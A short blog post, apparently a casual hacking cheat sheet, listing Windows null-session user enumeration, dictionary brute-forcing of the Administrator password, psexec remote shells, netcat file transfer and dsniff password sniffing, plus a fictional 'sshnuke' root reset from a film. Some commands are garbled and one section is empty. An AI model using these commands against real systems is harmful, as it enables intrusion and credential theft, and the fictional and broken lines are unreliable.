# nmap -sP

Get a list of users on Windows:

> net use \x.x.x.xipc$ “” /USER:””

> net users

What is the password policy:

> net accounts

Recover a lost password:

> enum -u Aministrator -f c:dict.txt -D x.x.x.x

Logon remotely:

> psexec \x.x.x.x -u Administrator cmd.exe

Transfer a file with netcat:

$ nc -l -p 6969 > file.txt

$ nc somehost 6969 < file.txt

Listen for passwords flying on the subnet:

# sudo dsniff

Reset the root password on an old server:

$ sshnuke -rootpw-“Z1ON0101”

Makeshift remote desktop:

From server:


you will enter password and the server will start running on port 6000 or so. From client:


Leave a Reply

האימייל לא יוצג באתר. שדות החובה מסומנים *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>